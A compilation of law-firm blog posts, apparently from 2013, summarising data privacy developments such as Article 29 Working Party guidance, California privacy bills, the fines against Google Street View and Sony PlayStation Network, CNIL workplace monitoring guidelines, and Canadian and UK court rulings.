EU Article 29 A29WP publishes new BCR guidance for processors

This post was written by Cynthia O'Donoghue.

The European Union (EU) data protection body, the Article 29 Working Party (A29WP), in April adopted new guidance on Binding Corporate Rules for Processors (BCPRs). The document supplements the opinion from June 2012, which listed elements required for valid BCPRs, by further clarifying what provisions and mechanisms must be included before BCPRs can be authorised. The BCPR process has been developed by the A29WP in response to a request from outsourcing providers to create a new legal instrument to legitimise international data transfers.

The new guidance emphasises that BCPRs are the preferred method for transfers of personal data from the EU to countries without “adequate levels of protection,” over other methods, such as the EU standard contractual clauses. BCPRs are preferred when transfers are voluminous and frequent between the primary data processor and sub-processors in the same organisation. BCPRs are also recognised within the mutual recognition scheme, such that authorisation of BCPRs by one EU member state will result in automatic authorisation in other participating EU member states.

Data controllers will remain responsible for ensuring that service providers only process data under their instructions, and that sufficient guarantees are in place to protect the personal data being transferred to a service provider and within that service provider group, even where BCPRs have been authorised.

The A29WP emphasises that the BCPRs must be binding both internally and externally, and recommends service providers implement strict and punitive policies or codes of conduct supported by intra-group agreements. For third-party sub-processors, service providers are required to enter into agreements requiring sub-processors to respect the same obligations as the processor group. The sub-processor agreement will need third-party beneficiary rights for the data controller and for data subjects. Service providers seeking authorisation for BCPRs will need to include extracts of relevant clauses in their authorisation application.

The guidance also specifies the limits imposed on the requirements for modifying authorised BCPRs and lists other compulsory clauses, such as provisions ensuring compliance, audit mechanisms and complaint handling, and a duty to cooperate with both the controller and the relevant data protection authority. The BCPRs must also designate a corporate member within the EU that will be liable for breaches of the BCPRs by members of the group outside the EU.

While this new tool was developed in response to calls from the outsourcing community, no BCPRs have been authorised to date, although the French authority, the CNIL, has admitted to having several applications pending.

EU Article 29 Working Party criticises the proposed Data Protection Impact Assessment templates for smart-meters

This post was written by Cynthia O'Donoghue.

The Article 29 Working Party (A29WP) adopted the Opinion on the Data Protection Impact Assessment Template for Smart Grid and Smart Metering Systems (Opinion), which evaluates the Privacy Impact Assessment (PIA) template that the member states intend to adopt. The PIA, which was prepared by industry representatives, seeks to ensure that smart-meter operators comply with data protection rules; however, the A29WP pointed out a number of inadequacies in the template.

The EU initiative to roll out smart gas and electricity meters, which can send usage data via remote communications, underpins the desire for a more effective and efficient energy supply. In the Opinion, the A29WP points out the risk that smart-meter usage data may be used to infer information about “consumers’ use of specific goods or devices, daily routines, living arrangements, activities, lifestyles and behaviour.”

The energy supply industry expert group developed the PIA to ensure that smart-meter operators comply with data protection rules, and to facilitate compliance assessments by Data Protection Authorities, as well as to provide information to consumers.

The PIA template contains an eight-step impact assessment and provides step-by-step guidance on how to carry it out. The A29WP admitted the proposed template contains useful elements, but criticised the failure to include any method of directly assessing the foreseeable impacts on the data subjects, including the risk of price discrimination or criminal acts facilitated by unauthorised profiling. The A29WP also felt the PIA template confused risks and threats, and failed to match specific risks to controls based on best practice. Other criticism included that the PIA template lacked sufficient guidance on the concepts of vulnerability, calculating and prioritising risks, choosing appropriate mitigating controls, and appropriately allocating data protection responsibilities between the different stakeholders. The A29WP also recommended including an analysis of industry-specific risks and relevant controls.

The A29WP acknowledged that the industry expert group is preparing ‘best available techniques’ that may address some of the criticisms, but it would wait to see the techniques included within the PIA template before it is resubmitted for a further opinion.

California Legislature Pushing Forward Multiple Data Privacy Bills

This post was written by Sarah Woo, Lisa B. Kim and Joshua B. Marker.

The California legislature is determined to be at the forefront in the development of data privacy law by drafting a number of data privacy protection bills that will impact companies’ obligations with respect to the disclosure, compilation, removal, or sharing of consumers’ personal information.

Click here to read the issued Client Alert.


CalOPPA Enforcement Grounded, For Now

This post was written by Steven Boranian, Joshua B. Marker, Lisa B. Kim, and Tyler M. Layton.

In a significant victory, Delta Airlines’ demurrer to the enforcement action filed by the state of California was sustained without leave to amend. We previously wrote about the case here. California alleged that Delta’s mobile application was in violation of CalOPPA because its privacy policy was not reasonably available within the application itself, and because the privacy policy on the Delta website did not accurately describe the information-collection practices of the mobile application.

Judge Marla Miller of San Francisco Superior Court sided with Delta and sustained its demurrer to the complaint without leave to amend. Despite the defense win, however, the decision provides little guidance regarding CalOPPA and its remedies, because the court did not address the substance of the statute. Rather, the court found that the claims against Delta were entirely preempted by the Airline Deregulation Act, which preempts any state “law, regulation, or other provision having the force and effect of law related to a price, route, or service of an air carrier.” The court declined to rule on the arguments pertaining to the substantive reach of CalOPPA.

In short, the precedential value of this decision outside of the airline industry is up in the air. While the decision may set the groundwork for preemption arguments that can be made in other federally regulated industries, the decision itself provides little guidance on CalOPPA specifically. With the potential for hefty statutory penalties, CalOPPA is still a privacy statute that requires careful consideration with regard to every company’s mobile applications.

'Coreper' Committee shows support for opening up public sector data to boost economy

This post was written by Cynthia O'Donoghue.

The Permanent Representatives Committee (otherwise known as ‘Coreper,’ consisting of representatives from the Member States and responsible for preparing the work of the Council of the EU) has expressed support for the European Commission’s plans through legislative changes to open up public sector data for re-use across Europe.

The initiative, which is part of the pending update to the 2003 Public Sector Information Directive, would make all generally accessible (i.e., non-personal) public sector information available for re-use across all Member States. Developers, programmers, businesses and citizens will be able to access and re-use public sector data at low cost, and this is predicted to result in a significant boost to the European economy.

Through proposed revisions to the 2003 Directive, a new genuine right to re-use public information would be introduced, including access to information stored by libraries, museums and archives. The revised Directive would allow such bodies to charge at most the marginal cost of reproduction, provision and dissemination of the information, so as to ensure the recovery of costs or, in exceptional cases, a reasonable return on investment. The revisions would also encourage public sector bodies to make data available in open, machine-readable formats. The programme would include geographical, health care, transport and statistical information, and this wider availability of public data could potentially enable economic growth worth tens of billions of euros per year across the EU. Neelie Kroes, Vice-President of the European Commission, said: “Opening up public data means opening up business opportunities, creating jobs and building communities.”

The initiative would apply to non-personal public information only, but some privacy groups have already expressed concerns, stating that the open availability of data must be scrutinised to avoid the so-called ‘jigsaw effect,’ whereby large quantities of non-personal data can be used to re-identify anonymous data or to profile individuals.

While Coreper’s support for the initiative is noteworthy, the proposed new rules still need to be formally approved by the European Parliament.

New FAQs Issued by the FTC for COPPA Compliance

This post was written by John P. Feldman and Caroline Klocko.

Earlier this week, the Federal Trade Commission (FTC) issued Frequently Asked Questions for complying with the Children's Online Privacy Protection Act (COPPA). The FAQs are intended as a supplement to the already issued compliance materials. As we previously reported, the revised COPPA Rule is set to go into effect on July 1, 2013. For companies running websites that collect information from children under 13, COPPA compliance will be critical. The FAQs will provide helpful guidance to reach that goal.

To learn more, please visit our sister blog, AdLaw By Request.

Google Inc. Fined for Street View by Hamburg DPA - There is More to the Street than Meets the Eye

This post was written by Katharina A. Weimer.

According to a press release Monday, the Hamburg Officer for Data Protection and Freedom of Information issued a fine in the amount of €145,000 against Google Inc. for illegal recording of information from Wi-Fi networks.

While Google’s cars roamed the streets in Germany during the years 2008-2010, they not only took pictures of houses and streets, but also illegally collected information from Wi-Fi networks within reach of the cars. Google admitted that this also encompassed content information, e.g., emails, passwords, photographs, chat logs, etc. While the public prosecutor closed the proceedings in November 2012 without bringing an action, the Hamburg DPA picked up on this in an administrative proceeding and has now concluded, with binding effect, that Google Inc. negligently collected data without authorization to do so. Concurrently with issuing the fine, the DPA instructed Google Inc. to immediately delete all information so collected, which Google Inc. has apparently already confirmed.

While Google Inc. was cooperative in clarifying this incident, and remains adamant that the company’s intention was never to collect this information at all, this clearly indicates that the company’s internal control mechanisms failed severely.

It comes as no surprise to the Hamburg DPA that incidents like this happen in multinational companies – with maximum fines of €300,000 for intentional violations and €150,000 for negligent acts, no deterrent effect can be achieved. The impending change to a penalty of up to 2% of a company’s annual turnover, to be introduced by the new European Regulation, is likely to significantly increase the motivation for companies to implement proper control mechanisms and to supervise their implementation and functioning.

Latin America Update: Mexico's new Privacy Notice Guidelines and Colombia's first data protection laws

This post was written by Cynthia O'Donoghue and Katalina Chin.

MEXICO: New Privacy Notice Guidelines were introduced April 17, 2013, specifying the format and contents of privacy notices required for the direct or automated collection of personal data.

The Guidelines seek to enable data subjects to make free and informed choices, by ensuring that they are given information and an opportunity to consent and object to the collection of their personal data. Privacy notices must be provided prior to collection, and must be set out in Spanish and in a format that is clear, easy to understand, and not misleading. A simplified or short form privacy notice can be justified in certain circumstances, but must inform data subjects where they can access a fuller privacy policy. The latter must contain, among other information, the data controller’s identity, the purposes of collection, and the rights of the data subject. The addendum to the Guidelines also provides additional recommendations, including special rules for handling the data of children.

Compliance with the Guidelines is mandatory and no exemptions are available. They will be particularly important to businesses operating in the jurisdiction that process personal data of their employees, customers and/or vendors, and/or to website operators placing cookies in Mexico. The Instituto Federal de Acceso a la Información y Protección de Datos (IFAI) is already exercising its enforcement powers, including the issuing of monetary penalties. In December 2012, the IFAI fined a Mexican pharmaceutical company a total of 2 million Mexican pesos (approximately US$162,000), giving a clear indication of its stance on data privacy violations.

COLOMBIA: Following the lead of Costa Rica and Peru, Colombia introduced its first data protection framework in March this year with Law No. 1581, which came into force April 18, 2013. The new law covers, among other matters, notice and consent requirements, cross-border data transfers, and the processing of children's personal data. In a vein similar to the IFAI in Mexico, the new Colombian data protection regime is supported by serious sanctions, which include monetary penalties of up to US$650,000, trading suspensions of up to six months, and even temporary or permanent closure of business operations for persistent violations.

CA Legislators Demand the Right To Be Forgotten (Quickly): Bill Targets Social Media

This post was written by Lisa B. Kim, Joshua B. Marker and Paul Bond.

California continues to be among the most aggressive states in proposing legislation restricting disclosure of personal identifying information. Earlier this month, California Senate Majority Leader Ellen M. Corbett (D) introduced SB 501, known as the Social Networking Privacy Act, which would require social networking websites to remove certain personal identifying information (PII) within 96 hours of the user’s request. SB 501 specifically defines personal identifying information to mean a person’s name, address, telephone number, driver’s license number, social security number, employee identification number, mother’s maiden name, demand deposit account number, savings account number, or credit card number. A social networking site would have to remove all such PII or face a steep civil penalty, up to $10,000 for each knowing violation. The Bill allows for parents to make the removal request on behalf of children who are younger than 18.

SB 501 follows on the heels of related legislation in the California Assembly, the “Right to Know Act of 2013,” which requires businesses to disclose, upon a consumer’s request, which personal information they retain and/or disclose to third parties.

Commissioner Brill to States: Data Brokers Aren't Going to Regulate Themselves

This post was written by Paul Bond and Christine E. Nielsen.

Federal Trade Commissioner Julie Brill, in a speech Monday at the National Association of Attorneys General (NAAG) Presidential Initiative Summit, urged the states to take a more active role in investigating data brokers and holding them accountable for violations of the Fair Credit Reporting Act (FCRA).

The FCRA regulates the use of credit report information for credit and insurance eligibility decisions, and also in background checks and other investigative reports. The traditional actors in this space have seen increasing competition from entrants into the market, many of which may not be aware of FCRA’s broad reach and statutory requirements. For example, the FTC recently notified entities that compile rental history data that they are likely subject to FCRA and must abide by its requirements.

The attorneys general have publicly pursued several privacy-related investigations and enforcement actions since Attorney General Gansler announced his “Privacy in a Digital Age” Presidential Initiative. The California attorney general has recently provided guidance to and engaged in enforcement actions against entities active in the mobile application space. And the attorneys general have recently concluded an enforcement action against Google, which resulted in a $7 million settlement for Google’s alleged interception of personal data through its Street View vehicles. Still, the FTC, and not the states, has pursued data brokers for FCRA violations.

Data brokers have long been of interest to the FTC, which singled the industry out as one that needs special attention in its 2012 privacy report. Regulators justify heightened scrutiny because data brokers amass large quantities of valuable consumer data, but are often unknown to consumers. The state attorneys general as a multi-state group investigated and eventually settled with ChoicePoint following that data broker’s 2004 security breach, and individually have investigated entities that engaged in pretexting to obtain and compile phone record data.

As we enter the final few months of Attorney General Gansler’s term as NAAG President, we will keep a close watch on whether the attorneys general answer Commissioner Brill’s call-to-action.

Spanish Constitutional Court sides with employer on inspection of an employee's derogatory communications

This post was written by Cynthia O'Donoghue and Katalina Chin.

The Spanish Constitutional Court has dismissed a case brought by an employee whose online communications were inspected by his employer. The opinion in the case of Ruiz Medina v. Global Sales Solutions Line (published 22 January 2013) was a noted change in the Constitutional Court’s line of judgments, which usually supports employee rights.

In 2004, Global Sales Solutions discovered the communications of employees using an instant messaging system that they had installed on a work computer in breach of company policy. The discussions included insulting comments about colleagues, managers and customers. After the responsible employees were identified, the company called a meeting during which some of the comments were read out and the authors were reprimanded, which was in turn met by a legal action brought by one of the reprimanded employees.

Spanish privacy law prohibits illegal access to individuals’ personal data, while the right to secrecy of communications prevents the interception of, or obtaining knowledge of, secret communications. These rights are enforceable by employees in the workplace and were relied upon by the employee against Global Sales Solutions. The Seville court dismissed the case, stating that there was no violation of privacy because of the prohibited use of company property during work. After this decision was upheld by a senior court, the claimant filed with the Constitutional Court relying on Article 18.3 of the Spanish Constitution, which protects secrecy in communications.

The Constitutional Court held that the right to privacy was waived because the computer was configured for common use and communications were set out as ‘open’. The court also pointed out that the unauthorised installation of communication programmes was banned at the company, and therefore there could have been no expectation of confidentiality. There was one dissenting opinion, which focused on the fact that the employer did not need to access the communications to confirm the breach of company policy.

Although the conclusion of this case may be somewhat surprising, seeing as the Constitutional Court historically favours employee rights, Spanish employers will welcome this opinion, which has helped set reasonable limits to the right of privacy in the workplace.

Facebook profiles can be used to predict undisclosed sensitive information

This post was written by Cynthia O'Donoghue.

New research from the University of Cambridge shows that information disclosed on Facebook profiles can be used to accurately predict a range of undisclosed sensitive personal data, including sexual orientation, ethnicity, religious and political views, age, and gender.

The research, which involved a study of the Facebook “Likes” of about 58,000 volunteers, found that highly sensitive information could be deduced from those “Likes” with a very high degree of accuracy. For example, the study correctly predicted male sexuality in 88% of cases, ethnicity in 95% of cases, and political views in 85% of cases. The report’s authors admitted using relatively simple methods to make their predictions but emphasised that there was great scope for improvement both in terms of models and data sets used.

This study is significant on a number of grounds. First, it reminds us of the ease with which it is possible for individuals to inadvertently disclose sensitive information about themselves. Second, it highlights the risks of organisations drawing conclusions and/or making decisions about the individuals in question based on the predictions made, some of which could be adverse to the individual. Third, the report also gives credence to the ongoing debate about whether data can ever be truly anonymous, especially as the techniques used in the study are likely to be used by most organisations trying to analyse and monetise big data sets, whether it be for behavioural profiling to assist online behavioural advertising, or strategies related to product development.

A key question is whether the study will impact the deliberations related to the proposed EU General Data Protection Regulation. Most data protection regimes, including in the EU, currently have stricter rules when ‘sensitive data,’ such as sexuality or religious beliefs, are involved. The draft Regulation contains clauses related to the profiling of individuals, as well as to anonymous data. The current draft Regulation would permit individuals to object generally to any profiling of themselves via big data sets or when done for direct marketing purposes, and retains the rule in the Directive on the re-identification of anonymous data. It remains to be seen how the relevant authorities will treat big sets of data which do not explicitly include, but which can be used to accurately predict, information covered by such specific regimes. It is possible that the trend for ‘big data’ will result in additional businesses becoming subject to more scrutiny by the regulatory authorities and more stringent privacy requirements.

APEC's Cross-Border Privacy Rules begin to gain momentum

This post was written by Cynthia O'Donoghue.

In February 2013, Mexico became the second approved participant in the Cross-Border Privacy Rules (CBPR) programme, a system for convenient cross-border data transfers introduced in 2011 by the Asia-Pacific Economic Cooperation (APEC). At the same time, APEC and EU Data Protection Authorities (DPAs) plan to create a unified cross-border system covering both regions. This will be a welcome development likely to stimulate global trade.

APEC operates as a forum of 21 countries from the Asia-Pacific region, promoting a free and open market and encouraging economic integration. One of its recent initiatives is the CBPR system, under which companies adopt internal privacy rules that are assessed by accountability agents. This promotes unified data privacy policies for businesses operating throughout APEC economies. APEC leaders pledged to implement the programme in November 2011. The first country to join the system, in July 2012, was the United States.

At the same time, representatives of APEC and the EU have begun discussions on creating a unified cross-border system. Achieving this will be helped by the fact that APEC’s CBPR and the EU’s binding corporate rules (BCRs) are very similar. Both systems involve companies developing internal policies for international transfers that are approved by third party authorities. A key difference, however, is that BCRs ensure that EEA businesses can transfer data to affiliates outside the EEA without breaching EU law, whereas the CBPR system is designed to promote transfers of data within the Asia-Pacific region. The French DPA (CNIL), which represents the EU in these discussions, has studied the similarities and differences between the two systems and carried out preliminary work on developing the unified mechanism. An initial road map for the project will be prepared by the APEC and the Article 29 Working Party in the coming months. Once introduced, the new system promises to bring much needed certainty for businesses operating or planning to operate in both regions.

Sony Computer Entertainment Europe to appeal the ICO's £250k fine

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner’s Office (the “ICO”) has served a monetary penalty notice of £250,000 on Sony Computer Entertainment Europe following the hacking of Sony’s PlayStation Network in April 2011, which it described as a serious breach of the UK Data Protection Act (the “Act”). The ICO stated that Sony did not take "appropriate technical measures" to protect the security of customers’ personal data stored on the network, but it’s been reported that Sony strongly disagrees with this ruling and is planning an appeal.

The ICO penalty notice report alleged that the Network Platform was infiltrated following a number of Distributed Denial of Service (“DDoS”) attacks on various online networks of the Sony group. A DDoS attack is an attempt by hackers to make a resource unavailable to legitimate users, typically by flooding it with traffic generated by malware installed on many infected computers. Whilst there are clearly ways of reducing the likelihood of such attacks, DDoS attacks are a serious and unfortunate method of 21st century e-crime.

The incident, in which personal details of gamers, including names, addresses, passwords and credit card numbers, were compromised, was described by the ICO as "likely to cause substantial damage or substantial distress," and left the customers exposed to a risk of identity theft. Having shut down the PlayStation Network during the investigations, Sony overhauled the entire system’s security infrastructure before re-granting access to customers.

Sony issued a statement strongly disagreeing with the ICO and indicating that it will appeal the monetary penalty notice. According to the statement, despite the ICO recognising that Sony was the victim of a criminal attack and that there was no evidence that encrypted payment card data was accessed or likely to be used for fraudulent purposes, a penalty was still issued. Sony acknowledged that criminal attacks on networks are on the increase and that it continually works to keep its networks resilient, secure and safe, because protecting its users’ data is of utmost importance.

CNIL satisfied with draft European Parliament report on the new Data Protection Regulation

This post was written by Daniel Kadar.

The French Data Protection Authority (DPA), the CNIL, has expressed its satisfaction on the draft report (the “draft Report”) released by the European Parliament on the new European Data Protection Regulation (the “Regulation”).

One of the major points of concern for the CNIL was that the draft Regulation had proposed that the DPA competent to rule on a complaint would be the DPA of the place where the data controller had its main establishment.

The CNIL considered in January 2012 that “In practice, this means that where a web user has a problem with a social network whose main establishment is in another member state, the complaint will be handled by the authority of the latter,” resulting in practice in less protection for citizens, given the broadening gap between European Data Protection Authorities, especially with the UK Commissioner.

The CNIL therefore warmly welcomes the conclusions of the report of the European Parliament’s Committee on Civil Liberties, Justice and Home Affairs that was published a couple of weeks ago. The amendments tabled by the rapporteur, Mr Albrecht, are considered by the CNIL as “real progress and an important stepping stone.”

Four major items have been highlighted by the CNIL:

  • Criterion of competence of the supervisory authorities:
    The draft Report changes the “rules of jurisdiction” and sets forth that the place of residence of the citizen will be used as the criterion of competence instead of the main establishment. The CNIL will in that respect regain power (and jurisdiction) over complaints filed in France, even if the main establishment of the data controller is located outside France.

  • Single point of contact:
    According to the draft Report, the lead authority will be designated as the single point of contact for controllers and processors who have activities in more than one Member State. This authority would have to handle cross-border cases in the name and on behalf of all the competent authorities, and to ensure coordination before adopting a decision. The CNIL sees here a real opportunity to expand its area of influence. The fight against Google that this blog has been following is to be seen in that respect as a real-life test.

  • Role of the European Data Protection Board (EDPB):
    The CNIL welcomes the creation of the EDPB, which would help to generate a harmonized implementation of the European rules and would have decisional power. According to the draft Report, the EDPB would draft guidelines for the supervisory authorities, and deliver opinions on the codes of conduct drafted at EU level. Moreover, the EDPB would have to be consulted by the European Commission in the preparation of delegated acts and implementing acts, the number of which would be much reduced.

  • Protection of citizens’ rights:
    The draft Report improves citizens’ rights by the use of ‘pseudonymisation’ and anonymisation of data, as well as by the free exercise of a right to object and the clarification of what constitutes the expression of consent in the online environment.

The CNIL finally welcomes the removal by the draft Report of the possibility to use non-binding legal instruments in the context of data transfers to non-EU Member States.

All in all, this draft Report constitutes a strong support for the “hardliners” led by the CNIL in the on-going discussions on the draft Regulation.

More Light or More Heat? California's Proposed 'Right to Know Act' Expands Shine the Light Requirements, May Expand Liability

This post was written by Joshua B. Marker and Lisa B. Kim.

California legislators have proposed revisions to the Shine the Light Act, which we first wrote about here. Under pending legislation, the Shine the Light Act would be renamed the “Right to Know Act of 2013,” with significantly expanded reach and requirements. If the proposed amendment passes, it would expose any company doing business with California consumers to new duties of information disclosure, and the potential for more class action litigation if a consumer alleges the company did not follow the complex law to the letter.

If passed, the Act would significantly change the manner in which California’s Shine the Light Act currently functions. First, it would apply to all businesses that retain and/or disclose a customer’s personal information, as opposed to only those businesses that have an “established business relationship.” Second, it would expand the categories of personal information that the business must disclose to include location, buying habits, and sexual orientation. Third, it would require the business to disclose what information has been given to any third party, and not just that which was used for telemarketing, mailings, and other direct marketing purposes. Finally, the bill as written would further the efforts of the plaintiffs’ class action bar to enforce the Act’s terms via class action lawsuits (seeking up to $3000 per violation). The bill specifically states that a violation of the Act would be “deemed to constitute an injury to a customer,” an attempt to defeat a major hurdle that similar class action lawsuits faced under the Shine the Light Act.

The retention of personal information for certain purposes is exempted from the proposed Act. These purposes include processing payments, providing customer service, verifying customer information, and addressing fraud, security or technical issues. Even with these exemptions, the Right to Know Act would represent a substantially more draconian set of rules than even the current Shine the Light Act. Every company that does business with California consumers must act now to have a firm understanding of what types of information the company is collecting and how that information is shared, or risk being unable to comply with California law.

CNIL Sets Forth Guidelines for Workplace Privacy Protection

This post was written by Daniel Kadar.

The French CNIL has adopted and published a new set of guidelines that set forth “best practices” about privacy protection at work (the Guidelines).

As is often the case in France – in particular where labor law regulations are concerned – the reader should bear in mind that the wording “best practices” in reality encompasses binding guidelines: these guidelines are supported by French labor law and case law that protects the privacy of individuals and the secrecy of their correspondence, even at work. This blog has recently highlighted an example in that respect.

Many companies have provided their employees with a company email account as well as a professional computer.

However, employees can use these tools during their breaks and can create or use some personal documents on their computer. They can also have some personal email on their professional address.

Therefore, is everything that is saved on these professional tools to be automatically considered as professional?

The CNIL offers some responses showing that the answer is not that clear:

1. Can employers monitor Internet access?

Employers may want to monitor or control Internet usage, or use Internet filtering software to block access to specific sites. According to the Guidelines, employers can monitor Internet use such as web-surfing and electronic mail. They can keep track of the list of websites visited and of the amount of time an employee spends online. However, they cannot use “keyloggers” to track all activities on a computer.

Any monitoring must be declared by employers to the CNIL. Employers must inform their employees about the procedure in place, its aim and duration. 

2. What can employers look at on their employee’s computer?

• Company email account

If a professional email system is used at the company, the employer is allowed to review its contents. However, even though the emails are sent or received on a company email account, employers do not have totally free access to these emails.

Employers cannot access any email marked as “private” or “personal,” except during a trial, and based on a court order.

Employers cannot receive a copy of every email sent by employees.

• Files

Employers can in principle access any file on the professional computer.

However, if files or document folders are marked as “personal” or “confidential,” employers can only access these in the presence of the employee, after having called the employee, or in case of a risk or particular event. Even seizures of personal files must be carried out in the employee’s presence.

3. What if an employee is on holiday?

If an employee is absent, the employer should first try to access the documents being sought through network access.

If this does not work, the employer can then request the network administrator to access these documents.

Finally, if access is still impossible, the employer can obtain the employee’s password, but this procedure has to remain exceptional, used only if there is no other choice and if it remains indispensable to override the employee’s privacy for the benefit of the company. The employer would be well advised to keep a record of all these steps.

4. How can employers inform employees?

The CNIL recommends in that respect that employers set up policies in their companies to notify their employees of every rule, or monitoring procedure in place.

5. What are the consequences during a trial? 

The first principle set forth by the Guidelines is that employers cannot use the result of illegal monitoring during a performance evaluation or against an employee under disciplinary procedure.

In the same way, documents that have been seized in breach of the Guidelines will not be considered as evidence in a trial and will be rejected by the judge.

Adequate collection of evidence is therefore key, since this can completely reverse the outcome of the procedure. 

CNIL vs. Google, Act V: Six Data Protection Authorities led by the French CNIL are now starting action in order to penalize Google

This post was written by Daniel Kadar.

Pursuant to their joint decision of 26 February 2013 to take action to penalize Google Inc. for refusing to revise its global privacy policy, six of the European Working Party 29 regulators, led by the French CNIL, have now jointly started to act against Google Inc. in their respective jurisdictions and according to their national laws.

The CNIL reported on 02 April 2013 that, after having met (at their request) with representatives of Google Inc. on 19 March, the six Data Protection Authorities (DPAs) of France, Germany, Italy, Spain, the Netherlands and the UK took action on the same day, based on the conclusion that no substantive change could be acknowledged.

The CNIL announced that such action, which would typically comprise a preliminary inquiry followed by controls, would start immediately at the controls step, since the inquiry has already been carried out over the past months and has led to substantive exchanges between the CNIL and Google Inc. (our blog has extensively reported on these exchanges).

The CNIL also announced that it would implement an international administrative cooperation procedure with the other European DPAs in that regard.

This joint action, which remarkably includes the UK Information Commissioner, demonstrates a strong willingness on the part of European DPAs to force international, and in particular U.S., companies to comply with European data protection regulation on major European markets.

It is to be seen as the first “real life” cooperation test in the framework of what new European Data Protection Regulations are scheduled to set up, and therefore to be monitored very closely, which this blog will continue to do.

UK Court Rules Fourth Data Protection Principle does not require absolute accuracy

This post was written by Cynthia O'Donoghue.

The UK Court of Appeal overturned a previous decision relating to the breach of the Fourth Data Protection Principle, which requires that personal data be accurate and kept up to date. Smeaton v Equifax plc confirms that the UK Data Protection Act 1998 (DPA) does not impose an unqualified duty to ensure absolute accuracy of personal data being processed, and that the duty to keep data accurate does not create a parallel duty in tort.

The appeal related to a judgment in the High Court issued by HHJ Thornton QC, which held that Equifax, a credit reference agency (CRA), had breached its obligation under the Fourth Data Protection Principle by processing incorrect data about the claimant’s credit history to the effect that he was subject to a bankruptcy order, even though the order had been rescinded.

The judgment in the High Court found that Equifax had breached the Fourth Data Protection Principle, as well as the First (fair and lawful processing) and the Fifth (personal data shall not be kept for longer than necessary), and that these breaches had caused the claimant’s loss.

The erroneous bankruptcy order had remained on the claimant’s credit record for several years, but the appellate court found that the Fourth Principle is not violated where the data controller has taken reasonable steps to ensure the accuracy of the data, which will be fact-specific to a particular case. Only where reasonable steps have not been taken would a claimant be entitled to compensation. Particular weight was placed on governmental guidance putting the responsibility on individuals whose bankruptcy has been annulled or rescinded to inform CRAs of that fact. On appeal, Equifax was found to have taken reasonable steps given the context of CRA regulation, consumer credit and insolvency legislation. The Court of Appeal judgment emphasises that, contrary to the initial decision, the Fourth Principle is not an absolute and unqualified obligation, but rather one based on the question of reasonableness. Since the CRA took reasonable steps to ensure the accuracy of the data, including obtaining the data from a reliable and authoritative source – the London Gazette – it was not in breach of the DPA, even if the data was ultimately inaccurate.

In addition, the initial decision found that the CRA’s obligations under the DPA as a data controller resulted in it owing a duty of care to Mr Smeaton in tort. This was again rejected by the Court of Appeal, which referred to the principle that statutory duties cannot generate parallel common law duties. Moreover, on the facts of the case, the alleged losses suffered were considered too remote from any alleged breach of the DPA to give rise to liability.

Canada's Supreme Court Holds Stricter Standards Apply to Search of Texts

This post was written by Mark S. Melodia and Frederick Lah.

On March 27, the Supreme Court of Canada held that the police must obtain a judicial wiretap order to get text message records from service providers, as opposed to a general warrant, which is easier to obtain.

In this case, the police obtained a general warrant requiring Telus, a national telecommunications company in Canada, to provide copies of the stored text messages of two of its subscribers. Telus applied to quash the general warrant, arguing that the acquisition of text messages from its database constitutes an interception of “private communications,” and therefore requires authorization under the wiretap authorization provisions of Part VI of Canada’s Criminal Code. After the lower court dismissed Telus’ application, the Supreme Court ruled 5-2 in striking down the general warrant, ruling that the police could not obtain the data without a more stringent court order that permitted the police to conduct wiretapping. The basis for the court’s ruling was that text messages are private communications and that restrictions should be in place for the police to obtain and disclose those messages. According to the majority:

“Text messaging is, in essence, an electronic conversation. Technical differences inherent in new technology should not determine the scope of protection afforded to private communications. The only practical difference between text messaging and traditional voice communications is the transmission process. This distinction should not take text messages outside the protection to which private communications are entitled under Part VI.”

In the United States, wiretapping and surveillance issues continue to appear before the U.S. Supreme Court and lower courts as well. See U.S. v. Jones and more recently, Clapper v. Amnesty International, which we previously analyzed. An underlying issue in all of these cases is how to apply long-standing constitutional schemes to new forms of communications. The U.S. Supreme Court seems hesitant to issue a broad ruling that would apply to all forms of electronic communications, perhaps, at least in part, because of the rapidly evolving nature of technology and communications. As courts across the nation (and in other countries) consider these issues, we’ll continue to follow these cases closely.

Fair Data Badge initiative launched by the Market Research Society

This post was written by Cynthia O'Donoghue.

On Data Privacy Day, 28 January 2013, the Market Research Society launched a ‘Personal Data Mark’ intended to be used by private companies operating on the Internet to build trust with the general public in their data processing procedures.

In an effort to increase awareness and provide an easily identifiable symbol of trust for consumers, the mark, otherwise known as the ‘Fair Data Badge,’ will be available on companies’ websites to demonstrate their compliance with ethical, fair, and proper collection, use and retention of data subjects’ personal data.

Only organisations which agree to adhere to 10 core principles will be eligible to apply for the Fair Data Badge. Reflecting the Data Protection Principles as contained in the Data Protection Directive 95/46/EC, the ‘Fair Data’ principles include provisions for consent to be obtained prior to collection, only using data collected for the purpose it was intended to be collected for, rights of access for data subjects, and efficient data security measures, amongst others.

Jane Frost, the Market Research Society’s CEO, demonstrated the importance of increasing transparency to consumers by declaring that “public concern [over online privacy] is at an all-time high.” The UK Information Commissioner Christopher Graham also lauded the badge initiative “as a step in the right direction of getting users of public data to make such a public commitment to standards.”

Francophone Data Protection Authorities postpone adoption of a new framework for international data transfers

This post was written by Cynthia O'Donoghue.

During its 6th Annual Meeting, the Association of Francophone Data Protection Authorities (AFAPDP) decided to postpone the adoption of a new framework for international data transfers between French-speaking nations. DataGuidance reports that after considering the proposals, the AFAPDP members decided that they need additional time to assess them. This means that the new regime, which is likely to have a major impact on many international businesses operating within francophone countries, may not be introduced until the end of 2013.

An AFAPDP spokesperson confirmed that the framework under consideration is heavily based on the European model of Binding Corporate Rules (BCR), but with an additional cooperation agreement between the francophone DPAs. The introduction of a unified system among French-speaking countries is likely to be welcomed by industry. The postponement could also mean that the framework may be adapted to take account of the draft EU General Data Protection Regulation, which is scheduled to be voted on in May.

The proposed framework is AFAPDP’s reaction to the lack of international data transfers regulations and a response to other regional frameworks in this area. As underlined by Jean Chartier, President of the AFAPDP and the Quebec DPA, an important part of the on-going process is to create a stable and comprehensive francophone domain of data protection. He also expressed hopes that the AFAPDP developments will encourage all francophone governments, especially those in Africa, to introduce adequate data protection regimes.

The Dutch Data Protection Authority publishes new guidelines on data security

This post was written by Cynthia O'Donoghue.

The Dutch Data Protection Authority (CBP) has published new guidelines on data protection and implementation of data security principles, which replace the previous guidance from 2001. The guidelines seek to provide practical advice on how data controllers and processors can ensure compliance with the Dutch Data Protection Act (Wet bescherming persoonsgegevens).

The new guidelines include a theoretical outline of the Dutch data protection regime, and practical instructions on how to implement it. For example, the document suggests that Dutch companies should deploy security measures, such as access control, logging, incident response management, confidentiality agreements and encryption.

